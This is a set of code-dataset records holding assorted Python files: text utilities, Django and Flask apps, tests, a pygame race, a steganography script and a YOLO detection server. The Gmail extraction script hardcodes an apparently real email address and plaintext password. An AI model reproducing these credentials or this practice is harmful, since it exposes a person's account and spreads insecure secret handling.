else:\n        syn_dict = [\n            line.split()\n            for line in lines]\n\n    return syn_dict\n\n\ndef clean_text(text, word_dict):\n    u\"\"\"Replace words in a text\n\n    Parameters\n    ----------\n    text : str\n        the text to process\n    word_dict : list\n        the replacement dictionary\n\n    Returns\n    -------\n    str\n\n    \"\"\"\n    for item in word_dict:\n        new = item[0]\n        for old in item[1:]:\n            text = text.replace(old, new)\n\n    return text\n\n\ndef clean_word(word, word_dict, mode=\"list\"):\n    u\"\"\"Replace a single word\n\n    Parameters\n    ----------\n    word : str\n        the word to replace\n    word_dict : {list, dict}\n        the replacement dictionary\n    mode : {\"list\", \"set\"}, optional, default=\"list\"\n        dictionary type\n\n    Returns\n    -------\n    str\n\n    Notes\n    -----\n    A word is matched at most once\n    \"\"\"\n    if mode == \"set\":\n        for item in word_dict:\n            if word in word_dict[item]:\n                return item\n    else:\n        for item in word_dict:\n            if word in item:\n                return item[0]\n\n    return word\n\n\ndef generate_name(mode=\"time\"):\n    u\"\"\"Generate a name\n\n    Parameters\n    ----------\n    mode : {\"time\", \"uuid\", \"timestamp\"}, optional, default=\"time\"\n        naming scheme\n\n    Returns\n    -------\n    str\n\n    \"\"\"\n    if mode == \"uuid\":\n        return str(uuid.uuid1())\n    elif mode == \"timestamp\":\n        return str(timestamp())\n    else:\n        return now(\"%Y%m%d%H%M%S\")\n","sub_path":"nlptools/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"245733488","text":"import imaplib\nimport email\nmail = imaplib.IMAP4_SSL('imap.gmail.com')\n#imaplib module implements connection based on IMAPv4 protocol\nmail.login(' upfeatemailproject@gmail.com', 'Ouvert2019')\n\nmail.list() #lists all labels in gmail\nmail.select('inbox') #connect to inbox\n\n\n#Fetching the latest emails\nresult, data = mail.uid('search',None, \"ALL\") #search and return uids instead\n\ni = len(data[0].split())\nfor x in range(i):\n    latest_email_uid = data[0].split()[x] #get the latest\n\n    result, email_data = mail.uid('fetch',latest_email_uid, '(RFC822)') #Fetch\n\n    raw_email = email_data[0][1] #here's the body, which is raw text of\n    #including headers and alternate payloads\n\nraw_email_string = raw_email.decode('utf-8')\n#converts byte literal to string removing b''\nemail_message = email.message_from_string(raw_email_string)\n#loop over all the available multiparts in the email\nfor part in email_message.walk():\n    if part.get_content_type() == \"text/plain\": #ignore attachments/html\n        body = part.get_payload(decode=True)\n        save_string = str(\"D:Dumpgmailemail_\" + str(x) + \".txt\")\n        #locate on disk\n        myfile = open(save_string, 'a')\n        myfile.write(body.decode('utf-8'))\n        #body is again a byte literal\n        myfile.close()\n    else:\n        continue\n","sub_path":"e_excell_project/extraction_email.py","file_name":"extraction_email.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"615939017","text":"# Problem: find how many primes there are between 101 and 200 and print them all.\n# Analysis: to test a prime, divide the number by every integer from 2 up to sqrt(n);\n# if any division is exact the number is not prime, otherwise it is prime.\nimport math\n\ndef su(n):\n    m = int(math.sqrt(n))\n    for i in range(2, m + 1):\n        if n % i == 0:\n            return False\n    return True\n\nfor i in range(101, 200):\n    if su(i):\n        print(i)","sub_path":"Python3/python100/12.0.py","file_name":"12.0.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"247032815","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.animation as animation\r\nimport mpl_toolkits.mplot3d.axes3d as p3\r\nfrom matplotlib import 
style\r\n\r\nstyle.use('fivethirtyeight')\r\nfig = plt.figure()\r\n# ax1 = fig.add_subplot(1,1,1) # for 2d Plotting\r\nax1 = p3.Axes3D(fig) # for 3D plotting\r\n\r\n\r\ndef animate(i):\r\n    file_data = open('rotation_matrix_demo.txt', 'r').read() # read the file, associate with a file pointer/ object\r\n    # print(file_data)\r\n    lines = file_data.split('\\n') ## read all lines, split with \\n and store in a list\r\n    roll = lines[0].split(':') # lines[0] stores 1st line in file. roll becomes a list, split by :\r\n    pitch = lines[1].split(':')\r\n    yaw = lines[2].split(':')\r\n\r\n    # print(roll[1])\r\n    # print(pitch[1])\r\n    # print([1])\r\n\r\n    phi = float(roll[1]) # phi is the 2nd value in the roll list; this is a string and is converted to float\r\n    theta = float(pitch[1])\r\n    psi = float(yaw[1])\r\n\r\n    # print(phi,' ',theta,' ',psi, type(phi))\r\n    vector = np.array([2,5,0]) # input arbitrary vector/ point.\r\n    t = rotate_z(psi,vector) # calculate new position and return vector\r\n\r\n    ax1.clear() # clears the plot every iteration\r\n    ax1.plot([0,vector[0]],[0,vector[1]], [0,0],'b') # plot input arbitrary vector\r\n    ax1.plot([0, t[0]], [0, t[1]], [0,0], 'r') # plot repositioned vector\r\n    # ax1.set_aspect('equal', 'box') # make the axis equal\r\n    # ax1.axis([-10,10,-10,10]) # set limits on axis.\r\n\r\n\r\n    # Setting the axes properties\r\n    ax1.set_xlim3d([-10.0, 10.0])\r\n    ax1.set_xlabel('X')\r\n    ax1.set_ylim3d([-10.0, 10.0])\r\n    ax1.set_ylabel('Y')\r\n    ax1.set_zlim3d([-10.0, 10.0])\r\n    ax1.set_zlabel('Z')\r\n    ax1.set_title('3D Test')\r\n\r\n\r\n\r\n\r\ndef rotate_z(psi, v):\r\n    psi_d = psi * np.pi/180.0 # convert deg to radians.\r\n    mat_z = np.array([[np.cos(psi_d), - np.sin(psi_d), 0],\r\n                      [np.sin(psi_d), np.cos(psi_d), 0],\r\n                      [0 , 0, 1]])\r\n    m = np.matmul(mat_z,v) # perform mat mul\r\n\r\n    print(m)\r\n    return m\r\n\r\n\r\n\r\nani = animation.FuncAnimation(fig, animate, interval=100)\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"rotation_matrix_demo.py","file_name":"rotation_matrix_demo.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"221853120","text":"\"\"\"\r\nAn employee of a company receives a salary raise every year. We know that:\r\nThe employee was hired in 1995 with an initial salary of R$ 1,000.00;\r\nIn 1996 they received a raise of 1.5% on the initial salary;\r\nFrom 1997 (inclusive) onwards, each raise is always double the previous year's percentage.\r\nWrite a program that determines the employee's current salary.\r\nAfter finishing this, change the program so the user can type in the employee's initial salary.\r\n\"\"\"\r\nfrom datetime import datetime\r\n\r\nhoje = datetime.now().year # current year\r\n\r\nwhile True:\r\n    try:\r\n        salario = float(input('Salario: R$'))\r\n        break\r\n    except ValueError:\r\n        print('Valor inválido!\\n')\r\n\r\ntaxa_aum = 0.015\r\n\r\nnovo_salario = salario * (1 + taxa_aum)\r\n\r\nfor s in range(1997, hoje + 1):\r\n    taxa_aum *= 2\r\n    novo_salario *= (1 + taxa_aum)\r\n\r\nprint(f'O salario atual é de R${novo_salario:.2f}')\r\n","sub_path":"03_Estrutura_de_Repeticao/38-AumentoDeSalario.py","file_name":"38-AumentoDeSalario.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"424687789","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import 
models, migrations\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('webAPI', '0007_auto_20141119_1452'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='panel_reading',\n name='created',\n field=models.DateTimeField(default=datetime.datetime(2014, 11, 19, 14, 58, 43, 789126, tzinfo=utc), auto_now_add=True),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='panel_reading',\n name='timestamp',\n field=models.DateTimeField(null=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"server/slipserver/webAPI/migrations/0008_auto_20141119_1458.py","file_name":"0008_auto_20141119_1458.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"39255737","text":"import logging\n\nfrom flask_restplus import Resource, reqparse\n\n\nclass Index(Resource):\n def get(self):\n return {\n \"description\": \"Currency exchange API\",\n \"version\": self.api.app.config[\"VERSION\"]\n }\n\n\nclass SupportedCurrencies(Resource):\n def get(self):\n return {\n \"supported_currencies\": self.api.app.config[\"SUPPORTED_CURRENCIES\"]\n }\n\n\nclass Quote(Resource):\n def __init__(self, *args, **kwargs):\n super(Quote, self).__init__(*args, **kwargs)\n self.client = self.api.app.exchange_client\n self.parser = reqparse.RequestParser()\n self.parser.add_argument(\n \"from_currency_code\",\n type=str,\n required=True,\n choices=self.api.app.config[\"SUPPORTED_CURRENCIES\"]\n )\n self.parser.add_argument(\n \"to_currency_code\",\n type=str,\n required=True,\n choices=self.api.app.config[\"SUPPORTED_CURRENCIES\"]\n )\n self.parser.add_argument(\n \"amount\",\n type=int,\n required=True\n )\n\n def get(self):\n args = self.parser.parse_args()\n from_currency = args[\"from_currency_code\"]\n to_currency = args[\"to_currency_code\"]\n amount = args[\"amount\"]\n try:\n exchange_rate = self.client.get_exchange_rate(from_currency, to_currency)\n except Exception as e:\n logging.log(logging.ERROR, e)\n return {\"error\": \"Could not get exchange rates\"}, 502\n return {\n \"exchange_rate\": round(exchange_rate, 3),\n \"amount\": round(amount * exchange_rate),\n \"currency_code\": to_currency,\n }\n","sub_path":"api/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"188840259","text":"# Tai Sakuma <tai.sakuma@gmail.com>\nimport pytest\nimport time\nimport multiprocessing\n\ntry:\n import unittest.mock as mock\nexcept ImportError:\n import mock\n\nfrom alphatwirl.progressbar import ProgressReportPickup\n\n##__________________________________________________________________||\n@pytest.fixture()\ndef presentation():\n return mock.MagicMock()\n\n##__________________________________________________________________||\n@pytest.fixture()\ndef queue():\n return multiprocessing.Queue()\n\n@pytest.fixture()\ndef pickup(queue, presentation):\n return ProgressReportPickup(queue, presentation)\n\n##__________________________________________________________________||\ndef test_start_join(pickup, queue, presentation):\n presentation.active.return_value = True\n pickup.start()\n queue.put(None)\n pickup.join()\n\n##__________________________________________________________________||\n@pytest.fixture()\ndef mock_queue():\n return mock.MagicMock()\n\n@pytest.fixture()\ndef pickup0(mock_queue, presentation):\n 
return ProgressReportPickup(mock_queue, presentation)\n\n##__________________________________________________________________||\ndef test_run_until_the_end_order_arrives_no_report(pickup0, mock_queue, presentation):\n\n    mock_queue.empty.side_effect = [False, True]\n    mock_queue.get.side_effect = [None]\n    pickup0._run_until_the_end_order_arrives()\n\n    assert [] == presentation.mock_calls\n\ndef test_run_until_the_end_order_arrives_one_report(pickup0, mock_queue, presentation):\n\n    report = mock.MagicMock()\n    mock_queue.empty.side_effect = [False, False, True]\n    mock_queue.get.side_effect = [report, None]\n    pickup0._run_until_the_end_order_arrives()\n\n    assert [mock.call.present(report)] == presentation.mock_calls\n\ndef test_run_until_the_end_order_arrives_one_report_once_empty(pickup0, mock_queue, presentation):\n\n    report1 = mock.MagicMock()\n    mock_queue.empty.side_effect = [False, True, False, True] # it becomes empty once\n    mock_queue.get.side_effect = [report1, None]\n    pickup0._run_until_the_end_order_arrives()\n\n    assert [mock.call.present(report1)] == presentation.mock_calls\n\ndef test_run_until_the_end_order_arrives_two_reports(pickup0, mock_queue, presentation):\n\n    report1 = mock.MagicMock()\n    report2 = mock.MagicMock()\n    mock_queue.empty.side_effect = [False, False, False, True]\n    mock_queue.get.side_effect = [report1, None, report2] # report2 arrives\n                                                          # after the end_order\n    pickup0._run_until_the_end_order_arrives()\n\n    assert [mock.call.present(report1), mock.call.present(report2)] == presentation.mock_calls\n\n##__________________________________________________________________||\n@pytest.fixture()\ndef mocktime(monkeypatch):\n    ret = mock.MagicMock(return_value = 1000.0)\n    monkeypatch.setattr(time, 'time', ret)\n    return ret\n\ndef test_run_until_reports_stop_coming_no_report(pickup0, mock_queue, presentation, mocktime):\n    presentation.active.side_effect = [False]\n    pickup0._run_until_reports_stop_coming()\n    assert [] == presentation.present.mock_calls\n\ndef test_run_until_reports_stop_coming_one_report(pickup0, mock_queue, presentation, mocktime):\n    presentation.active.side_effect = [True, False]\n    report = mock.MagicMock()\n    mock_queue.empty.side_effect = [False, False, True]\n    mock_queue.get.side_effect = [report, None]\n    pickup0._run_until_reports_stop_coming()\n    assert [mock.call(report)] == presentation.present.mock_calls\n\ndef test_run_until_reports_stop_coming_one_report_timeout(pickup0, mock_queue, presentation, mocktime):\n    presentation.active.return_value = True\n    report = mock.MagicMock()\n    mock_queue.empty.return_value = True\n    mock_queue.get.side_effect = [report, None]\n    mocktime.side_effect = [1000.0, 1003.0]\n    pickup0._run_until_reports_stop_coming()\n    assert [ ] == presentation.present.mock_calls\n\n##__________________________________________________________________||\n","sub_path":"tests/unit/progressbar/test_ProgressReportPickup.py","file_name":"test_ProgressReportPickup.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"490422499","text":"import pygame, sys\nimport random\n\nclass Runner():\n    __customes = (\"turtle\", \"fish\", \"prawn\", \"moray\", \"octopus\")\n    def __init__(self, x=0, y=0):\n        ixCustome = random.randint(0,4)\n        \n        self.custome = pygame.image.load(\"images/{}.png\".format(self.__customes[ixCustome]))\n        self.position = [x,y]\n        self.name = \"\"\n        \n    def avanzar(self):\n        self.position[0] += random.randint(1,6)\n\nclass Game():\n    runners= 
[]\r\n    __posY= (160, 200, 240, 280)\r\n    __names= (\"Speedy\", \"Lucera\", \"Alonso\", \"Torcuata\")\r\n    __startLine=-5\r\n    __finishLine =620\r\n    \r\n    def __init__(self):\r\n        self.__screen = pygame.display.set_mode((640, 480))\r\n        self.__background = pygame.image.load(\"images/background.png\")\r\n        pygame.display.set_caption (\"Carrera de bichos\")\r\n        \r\n        for i in range (4):\r\n            theRunner = Runner (self.__startLine,self.__posY[i])\r\n            theRunner.name = self.__names[i]\r\n            self.runners.append(theRunner)\r\n        \r\n        \r\n    def competir (self):\r\n        gameOver = False\r\n        # check for events\r\n        while not gameOver:\r\n            for event in pygame.event.get():\r\n                if event.type== pygame.QUIT:\r\n                    gameOver = True\r\n            \r\n            # update the runners\r\n            for activeRunner in self.runners:\r\n                activeRunner.avanzar()\r\n                if activeRunner.position[0] >= self.__finishLine:\r\n                    print (\"{} ha ganado\".format(activeRunner.name))\r\n                    gameOver = True\r\n                    \r\n            # redraw the screen\r\n            self.__screen.blit(self.__background, (0,0))\r\n            \r\n            for runner in self.runners:\r\n                self.__screen.blit(runner.custome, runner.position)\r\n\r\n            pygame.display.flip()\r\n            \r\n        # once we have a winner, wait until the window is closed\r\n        while True:\r\n            for event in pygame.event.get():\r\n                if event.type==pygame.QUIT:\r\n                    pygame.quit()\r\n                    sys.exit()\r\n            \r\n            \r\nif __name__== \"__main__\":\r\n    \r\n    game = Game()\r\n    pygame.font.init()\r\n    game.competir()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"253441982","text":"\"\"\"A program that encodes and decodes hidden messages in images through LSB steganography\"\"\"\nfrom PIL import Image, ImageFont, ImageDraw\nimport textwrap\n\ndef decode_image(file_location=\"images/encoded_sample.png\"):\n    \"\"\"Decodes the hidden message in an image\n\n    file_location: the location of the image file to decode. By default is the provided encoded image in the images folder\n    \"\"\"\n    encoded_image = Image.open(file_location)\n\n    x_size = encoded_image.size[0]\n    y_size = encoded_image.size[1]\n\n    decoded_image = Image.new(\"RGB\", encoded_image.size)\n    pixels = decoded_image.load()\n\n    for x in range(x_size):\n        for y in range(y_size):\n            if lsb_of_red_pixel(encoded_image, x, y):\n                pixels[x, y] = (255,255,255)\n            else:\n                pixels[x, y] = (0, 0, 0)\n\n    #pixels[x, y] = [(0,0,0) if lsb_of_pixel(red_channel, x, y) else (1,1,1)]\n\n    decoded_image.save(\"images/decoded_image.png\")\n    decoded_image.show()\n\ndef write_text(text_to_write, image_size):\n    \"\"\"Writes text to an RGB image. Automatically line wraps\n\n    text_to_write: the text to write to the image\n    image_size: size of the resulting text image. Is a tuple (x_size, y_size)\n    \"\"\"\n    image_text = Image.new(\"RGB\", image_size)\n    font = ImageFont.load_default().font\n    drawer = ImageDraw.Draw(image_text)\n\n    #Text wrapping. Change parameters for different text formatting\n    margin = offset = 10\n    for line in textwrap.wrap(text_to_write, width=60):\n        drawer.text((margin,offset), line, font=font)\n        offset += 10\n    return image_text\n\ndef encode_image(text_to_encode, template_image=\"images/samoyed.jpg\", output_image=\"images/samoyed.secret.png\"):\n    \"\"\"Encodes a text message into an image\n\n    text_to_encode: the text to encode into the template image\n    template_image: the image to use for encoding. 
An image is provided by default.\n \"\"\"\n\n image = Image.open(template_image)\n pixels = image.load()\n\n x_size = image.size[0]\n y_size = image.size[1]\n\n for x in range(x_size):\n for y in range(y_size):\n if lsb_of_red_pixel(image, x, y):\n pixels[x,y] = (image.getpixel((x, y))[0] - 1, image.getpixel((x, y))[1], image.getpixel((x, y))[2])\n\n text_image = Image.new(\"RGB\", image.size)\n\n usr_font = ImageFont.truetype(\"ComicNeue.otf\", 25)\n d_usr = ImageDraw.Draw(text_image)\n d_usr = d_usr.text((10,10), text_to_encode, (255,255,255), font=usr_font)\n\n for x in range(x_size):\n for y in range(y_size):\n if lsb_of_red_pixel(text_image, x, y):\n pixels[x,y] = (image.getpixel((x, y))[0] + 1, image.getpixel((x, y))[1], image.getpixel((x, y))[2])\n\n image.save(output_image)\n\n\n\ndef lsb_of_red_pixel(image, x, y):\n return image.getpixel((x, y))[0] % 2\n\nif __name__ == '__main__':\n # print(\"Decoding the image...\")\n # decode_image()\n\n print(\"Encoding the image...\")\n encode_image(\"Hi meme\")\n\n print(\"Decoding Encoded image...\")\n decode_image(\"images/samoyed.secret.png\")\n","sub_path":"steganography.py","file_name":"steganography.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"568226148","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\n\n# Import data (Make sure to parse dates. Consider setting index column to 'date'.)\ndf = pd.read_csv('./fcc-forum-pageviews.csv', index_col=0, parse_dates=True)\n\n# Clean data\ndf = df[(df['value'] >= (df['value'].quantile(0.025))) & (df['value'] <= (df['value'].quantile(0.975)))]\n\ndef draw_line_plot():\n # Draw line plot\n fig = df.plot(title='Daily freeCodeCamp Forum Page Views 5/2016-12/2019', \n xlabel='Date',\n ylabel='Page Views',\n figsize=(15,5),\n legend=False,\n style='-r').get_figure()\n\n # Save image and return fig (don't change this part)\n fig.savefig('line_plot.png')\n return fig\n\ndef draw_bar_plot():\n # Copy and modify data for monthly bar plot\n df_bar = df.copy()\n df_bar['year'] = df_bar.index.year\n df_bar['Months'] = df_bar.index.month_name()\n\n months = ['January', 'February', 'March', 'April','May','June', 'July', 'August','September', 'October', 'November', 'December']\n df_bar['Months'] = pd.CategoricalIndex(df_bar['Months'], categories=months, ordered=True)\n\n df_bar.set_index('year', inplace=True)\n df_bar = df_bar.groupby([df_bar.index, df_bar['Months']])['value'].sum().unstack()\n\n # Draw bar plot\n fig = df_bar.plot(kind='bar',\n xlabel='Years',\n ylabel='Average Page Views',\n figsize=(9,9),\n legend=True).get_figure()\n\n # Save image and return fig (don't change this part)\n fig.savefig('bar_plot.png')\n return fig\n\ndef draw_box_plot():\n # Prepare data for box plots (this part is done!)\n df_box = df.copy()\n df_box.reset_index(inplace=True)\n df_box['Year'] = [d.year for d in df_box.date]\n df_box['Month'] = [d.strftime('%b') for d in df_box.date]\n df_box = df_box.rename(columns={'value':'Page Views'})\n\n # Draw box plots (using Seaborn)\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 8))\n \n sns.boxplot(x='Year', y='Page Views', data=df_box, ax=ax1)\n sns.boxplot(x='Month', y='Page Views', data=df_box, ax=ax2, \n order=['Jan', 'Feb', 'Mar', 'Apr','May','Jun', 'Jul', 'Aug','Sep', 'Oct', 'Nov', 'Dec'])\n ax1.set_title('Year-wise Box Plot (Trend)')\n 
ax2.set_title('Month-wise Box Plot (Seasonality)')\n\n # Save image and return fig (don't change this part)\n fig.savefig('box_plot.png')\n return fig\n","sub_path":"8-Data_Analysis_with_Python_Certification/4-Page_View_Time_Series_Visualizer/time_series_visualizer.py","file_name":"time_series_visualizer.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"296629479","text":"from django import forms\nfrom .models import Tarjeta\nfrom django.contrib.auth import authenticate\nfrom datetime import date\n\nclass CrearTarjetaForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['numero'].widget.attrs['class'] = 'form-control'\n self.fields['numero'].widget.attrs['required'] = 'True'\n self.fields['numero'].widget.attrs['placeholder'] = 'Ingresa el número de la tarjeta'\n self.fields['saldo'].widget.attrs['placeholder'] = 'Ingresa el saldo que deseas agregar'\n self.fields['saldo'].widget.attrs['required'] = 'True'\n\n\n\n class Meta:\n\n model=Tarjeta\n fields = (\n 'franquicia',\n 'numero',\n 'fecha_vencimiento',\n 'cvv',\n 'saldo'\n )\n widgets = {\n 'fecha_vencimiento': forms.DateInput(\n\n attrs={\n 'type':'date',\n }\n ),\n 'cvv': forms.TextInput(\n\n attrs={\n 'class':'form-control',\n 'placeholder':'Ingresa el código cvv',\n 'required': 'True'\n }\n ),\n 'franquicia': forms.Select(\n\n attrs={\n 'class': 'form-control',\n 'required': 'True'\n }\n ),\n\n }\n\n def clean_numero(self):\n numero = self.cleaned_data['numero']\n\n if len(numero) != 16:\n self.add_error('numero', forms.ValidationError('La tarjeta debe contener 16 digitos.'))\n elif not all(x.isdigit() for x in numero):\n self.add_error('numero', forms.ValidationError('La tarjeta solo debe contener números.'))\n\n return numero\n\n \"\"\"\n def clean_fecha_vencimiento(self):\n fecha_vencimiento = self.cleaned_data['fecha_vencimiento']\n\n years = fecha_vencimiento.year - date.today().year\n\n if years == 0:\n\n months = date.today().month - fecha_vencimiento.month\n\n if months >= 0:\n self.add_error('fecha_vencimiento', forms.ValidationError('La tarjeta tiene una fecha menor o está a punto de vencerse. Por favor, intenta nuevamente.'))\n else:\n self.add_error('fecha_vencimiento', forms.ValidationError('La tarjeta tiene una fecha menor o está a punto de vencerse. 
Por favor, intenta nuevamente.'))\n\n return fecha_vencimiento\n \"\"\"\n def clean_cvv(self):\n cleaned_data = super(CrearTarjetaForm, self).clean()\n cvv = str(self.cleaned_data['cvv'])\n if int(cvv.__len__()) != 3:\n self.add_error('cvv', forms.ValidationError('El cvv debe tener 3 digitos.'))\n return self.cleaned_data\n\n def clean_saldo(self):\n saldo = self.cleaned_data['saldo']\n\n if saldo < 1000:\n self.add_error('saldo', forms.ValidationError('El saldo debe ser mayor o igual a $1000'))\n\n return saldo\n\nclass ActualizarTarjetaForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['saldo'].widget.attrs['class'] = 'form-control'\n self.fields['saldo'].widget.attrs['required'] = 'True'\n\n class Meta:\n model = Tarjeta\n fields = ('saldo',)\n\n def clean_saldo(self):\n saldo = self.cleaned_data['saldo']\n\n if saldo < 1000:\n self.add_error('saldo', forms.ValidationError('El saldo debe ser mayor o igual a 1000'))\n\n return saldo\n\n\n","sub_path":"applications/tarjetas/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"140357379","text":"#Importing all the required libraries like flask, cv2, numpy\r\nimport flask\r\nfrom flask import request\r\nimport cv2\r\nimport numpy as np\r\nimport json\r\n\r\n#Importing ThreadPoolExecutor Library for Multithreading\r\nfrom concurrent.futures import ThreadPoolExecutor\r\n\r\n#Creating an instance of ThreadPoolExecutor and setting 4 as maximum number of workers i.e\r\n#this thread pool will only have 4 concurrent threads\r\nexecutor = ThreadPoolExecutor(4)\r\n\r\n#Creates the Flask application object, which contains data about the application\r\napp = flask.Flask(__name__)\r\n\r\n#Defining default route as GET request and mapping it to test() method for testing the application\r\n@app.route('/')\r\ndef test():\r\n return \"Hello, World!\"\r\n\r\n#Defining /api/object_detection route as POST request and mapping it to image_scan() method for recieving client request\r\n@app.route('/api/object_detection', methods=['POST'])\r\ndef image_scan():\r\n\r\n #Reading file buffer from the request object sent by the client\r\n img_str = request.files[\"image\"].read()\r\n\r\n #Executing image_scan_implimentation() as individual threads by ThreadPoolExecutor object and passing image data as argument\r\n exec = executor.submit(image_scan_implimentation, img_str)\r\n\r\n #Returning the python dict to the client which image_scan_implimentation() method is returning\r\n return exec.result()\r\n\r\n\r\n#Method implimenting the business logic of the API by taking the buffer image and returning the dict having list of objects detected along\r\n#with their accuracy\r\ndef image_scan_implimentation(img_str):\r\n\r\n #Loading trained model of YOLO along with its config file.\r\n net = cv2.dnn.readNet(\"yolov3-tiny.weights\", \"yolov3-tiny.cfg\")\r\n\r\n #Reading the objects names that YOLO can detect from coc.names file and storing them in list classes\r\n classes = []\r\n with open(\"coco.names\", \"r\") as f:\r\n classes = [line.strip() for line in f.readlines()]\r\n\r\n layer_names = net.getLayerNames()\r\n output_layers = [layer_names[i[0] - 1]\r\n for i in net.getUnconnectedOutLayers()]\r\n\r\n nparr = np.frombuffer(img_str, np.uint8)\r\n\r\n # cv2.IMREAD_COLOR in OpenCV 3.1\r\n img_np = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\r\n\r\n img = cv2.resize(img_np, None, fx=0.4, 
fy=0.4)\r\n\r\n # Detecting objects by using Blob which is used to extract feature from the image and \r\n # to resize them to 416x416 which gives both accuracy and speed\r\n blob = cv2.dnn.blobFromImage(\r\n img, 0.00392, (416, 416), (0, 0, 0), True, crop=False)\r\n net.setInput(blob)\r\n\r\n #object_info is an array that conains all the informations about objects detected, their position and the confidence about the detection.\r\n object_info = net.forward(output_layers)\r\n\r\n objects_list = []\r\n\r\n #Traversing the object_info array to find the objects detected and their confidence(position)\r\n for obj in object_info:\r\n for detection in obj:\r\n scores = detection[5:]\r\n class_id = np.argmax(scores)\r\n accuracy = scores[class_id]\r\n #Taking accuracy/confidence level 1% for detection of objects.\r\n if accuracy > 0.01:\r\n objects_dict = {}\r\n objects_dict[\"label\"] = str(classes[class_id])\r\n objects_dict[\"accuracy\"] = str(round(float(accuracy)*100, 2))\r\n objects_list.append(objects_dict)\r\n\r\n #Returning the python dict having all the info about the objects detected by the model\r\n return {\"objects\": objects_list}\r\n\r\nif __name__ == \"__main__\":\r\n #Using flask object to runs the application server on Port 2020 in debug mode with host - 0.0.0.0\r\n app.run(host=\"0.0.0.0\", port=2020, debug=True)\r\n","sub_path":"Client/iWebLens_server.py","file_name":"iWebLens_server.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"92150478","text":"\"\"\"Tests for PSBT wrappers\"\"\"\nimport unittest\nfrom wallycore import *\n\nSAMPLE = \"cHNidP8BAFICAAAAAZ38ZijCbFiZ/hvT3DOGZb/VXXraEPYiCXPfLTht7BJ2AQAAAAD/////AfA9zR0AAAAAFgAUezoAv9wU0neVwrdJAdCdpu8TNXkAAAAATwEENYfPAto/0AiAAAAAlwSLGtBEWx7IJ1UXcnyHtOTrwYogP/oPlMAVZr046QADUbdDiH7h1A3DKmBDck8tZFmztaTXPa7I+64EcvO8Q+IM2QxqT64AAIAAAACATwEENYfPAto/0AiAAAABuQRSQnE5zXjCz/JES+NTzVhgXj5RMoXlKLQH+uP2FzUD0wpel8itvFV9rCrZp+OcFyLrrGnmaLbyZnzB1nHIPKsM2QxqT64AAIABAACAAAEBKwBlzR0AAAAAIgAgLFSGEmxJeAeagU4TcV1l82RZ5NbMre0mbQUIZFuvpjIBBUdSIQKdoSzbWyNWkrkVNq/v5ckcOrlHPY5DtTODarRWKZyIcSEDNys0I07Xz5wf6l0F1EFVeSe+lUKxYusC4ass6AIkwAtSriIGAp2hLNtbI1aSuRU2r+/lyRw6uUc9jkO1M4NqtFYpnIhxENkMak+uAACAAAAAgAAAAAAiBgM3KzQjTtfPnB/qXQXUQVV5J76VQrFi6wLhqyzoAiTACxDZDGpPrgAAgAEAAIAAAAAAACICA57/H1R6HV+S36K6evaslxpL0DukpzSwMVaiVritOh75EO3kXMUAAACAAAAAgAEAAIAA\"\n\n\nclass PSBTTests(unittest.TestCase):\n\n def _try_invalid(self, fn, psbt, *args):\n with self.assertRaises(ValueError):\n fn(None, 0, *args) # Null PSBT\n with self.assertRaises(ValueError):\n fn(psbt, 1, *args) # Invalid index\n\n def _try_set(self, fn, psbt, valid_value, null_value=None):\n fn(psbt, 0, valid_value) # Set\n fn(psbt, 0, null_value) # Un-set\n self._try_invalid(fn, psbt, valid_value)\n\n def _try_get_set_b(self, setfn, getfn, lenfn, psbt, valid_value, null_value=None):\n self._try_set(setfn, psbt, valid_value, null_value)\n setfn(psbt, 0, valid_value) # Set\n self._try_invalid(lenfn, psbt)\n self._try_invalid(getfn, psbt)\n ret = getfn(psbt, 0) # Get\n self.assertEqual(valid_value, ret)\n\n 